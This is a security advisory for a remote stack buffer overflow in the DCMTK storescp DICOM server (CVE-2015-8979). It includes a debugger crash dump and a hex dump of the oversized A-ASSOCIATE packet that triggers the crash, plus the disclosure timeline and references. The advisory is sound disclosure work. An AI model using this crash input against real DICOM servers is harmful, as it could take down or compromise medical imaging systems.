Zero Science Lab » DCMTK storescp DICOM storage (C-STORE) SCP Remote Stack Buffer Overflow

DCMTK storescp DICOM storage (C-STORE) SCP Remote Stack Buffer Overflow

Title: DCMTK storescp DICOM storage (C-STORE) SCP Remote Stack Buffer Overflow
Advisory ID: ZSL-2016-5384
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 16.12.2016

Summary

DCMTK is a collection of libraries and applications implementing large parts the DICOM standard. It includes software for examining, constructing and converting DICOM image files, handling offline media, sending and receiving images over a network connection, as well as demonstrative image storage and worklist servers. DCMTK is is written in a mixture of ANSI C and C++. It comes in complete source code and is made available as "open source" software.

Description

"At several places in the code a wrong length of ACSE data structures received over the network can cause overflows or underflows when processing those data structures. Related checks have been added at various places in order to prevent such (possible) attacks. Thanks to Kevin Basista for the report."

The bug will indeed affect all DCMTK-based server applications that accept incoming DICOM network connections that are using the dcmtk-3.6.0 and earlier versions. Developers are advised to apply the patched-DCMTK-3.6.1_20160216 fix commit from Dec 14, 2015.

--------------------------------------------------------------------------------


 Process 27765 stopped

 * thread #1: tid = 0x3e4b46, 0x00000001000a6f1d storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x10380001b)

     frame #0: 0x00000001000a6f1d storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325

 storescp`parsePresentationContext:

 ->  0x1000a6f1d <+3325>: movb   (%rax), %al

     0x1000a6f1f <+3327>: movzbl %al, %eax

     0x1000a6f22 <+3330>: cmpl   $0x40, %eax

     0x1000a6f25 <+3333>: movl   %eax, -0xa74(%rbp)

 (lldb) re r

 General Purpose Registers:

        rax = 0x000000010380001b

        rbx = 0x0000000000000000

        rcx = 0x00000001002d40f0  vtable for log4cplus::spi::AppenderAttachable + 16

        rdx = 0x0000000000000010

        rdi = 0x00007fff5fbf78a0

        rsi = 0x3f7bc30000000000

        rbp = 0x00007fff5fbf7b30

        rsp = 0x00007fff5fbf7030

         r8 = 0x0000000100733918

         r9 = 0x00000000003e4b46

        r10 = 0x0000000100733920

        r11 = 0xffffffff00000000

        r12 = 0x0000000000000000

        r13 = 0x0000000000000000

        r14 = 0x0000000000000000

        r15 = 0x0000000000000000

        rip = 0x00000001000a6f1d  storescp`parsePresentationContext(unsigned char, dul_presentationcontext*, unsigned char*, unsigned long*, unsigned long) + 3325

     rflags = 0x0000000000010246

         cs = 0x000000000000002b

         fs = 0x0000000000000000

         gs = 0x0000000000000000



 (lldb)



 =====



 $ bin ./storescp -d 4242

 D: $dcmtk: storescp v3.6.0 2011-01-06 $

 D: 

 D: setting network receive timeout to 60 seconds

 D: PDU Type: Associate Request, PDU Length: 32881 + 6 bytes PDU header

 D: Only dumping 512 bytes.

 D:   01  00  00  00  80  71  00  01  00  00  4f  52  54  48  41  4e

 D:   43  20  20  20  20  20  20  20  20  20  54  45  53  54  53  55

 D:   49  54  45  00  00  00  00  00  00  00  00  00  00  00  00  00

 D:   00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00

 D:   00  00  00  00  00  00  00  00  00  00  10  00  00  15  31  2e

 D:   32  2e  38  34  30  2e  31  30  30  30  38  2e  33  2e  31  2e

 D:   31  2e  31  20  00  80  00  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D:   42  43  44  41  42  43  44  41  42  43  44  41  42  43  44  41

 D: 

 D: Parsing an A-ASSOCIATE PDU

 [1]    25553 segmentation fault  ./storescp -d 4242

 $ bin

--------------------------------------------------------------------------------

Vendor

OFFIS e. V. - http://www.dcmtk.org

Affected Version

<= 3.6.0

Tested On

Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
MacOS X 10.12.2 Sierra
Linux Ubuntu 14.04.5
FreeBSD 10.3

Vendor Status

[14.12.2016] Vendor informed.
[14.12.2016] Vendor confirms the issue, it was fixed in the 1b6bb76 commit (v3.6.1), scheduling official stable release 3.6.2 in Feb/Mar 2017.
[16.12.2016] Public security advisory released.

PoC

storescp_bof.py

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] https://github.com/commontk/DCMTK/commit/1b6bb76
[2] https://www.exploit-db.com/exploits/40928/
[3] https://packetstormsecurity.com/files/140191
[4] https://cxsecurity.com/issue/WLB-2016120098
[5] http://www.vfocus.net/art/20161219/13214.html
[6] https://bugs.gentoo.org/show_bug.cgi?id=602918
[7] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8979
[8] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8979
[9] http://www.securityfocus.com/bid/94951
[10] https://exchange.xforce.ibmcloud.com/vulnerabilities/119844
[11] http://forum.dcmtk.org/viewtopic.php?f=1&t=4498
[12] https://security-tracker.debian.org/tracker/CVE-2015-8979
[13] http://www.linuxcompatible.org/news/story/dcmtk_security_update_for_debian.html
[14] http://www.debian.org/security/2016/dsa-3749
[15] https://www.tenable.com/plugins/index.php?view=single&id=95955
[16] https://www.tenable.com/plugins/index.php?view=single&id=96193
[17] http://plugins.openvas.org/nasl.php?oid=703749
[18] https://vulners.com/zeroscience/ZSL-2016-5384
[19] https://bugzilla.redhat.com/show_bug.cgi?id=1405919
[20] https://ubuntu.com/security/notices/USN-5882-1
[21] https://www.linux.org/threads/usn-5882-1-dcmtk-vulnerabilities.43991/

Changelog

[16.12.2016] - Initial release
[20.12.2016] - Added reference [2], [3], [4], [5], [6], [7], [8] and [9]
[24.12.2016] - Added reference [10]
[29.12.2016] - Added reference [11], [12] and [13]
[31.01.2017] - Added reference [14], [15], [16], [17] and [18]
[13.04.2017] - Added reference [19]
[26.07.2023] - Added reference [20] and [21]

Contact

Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk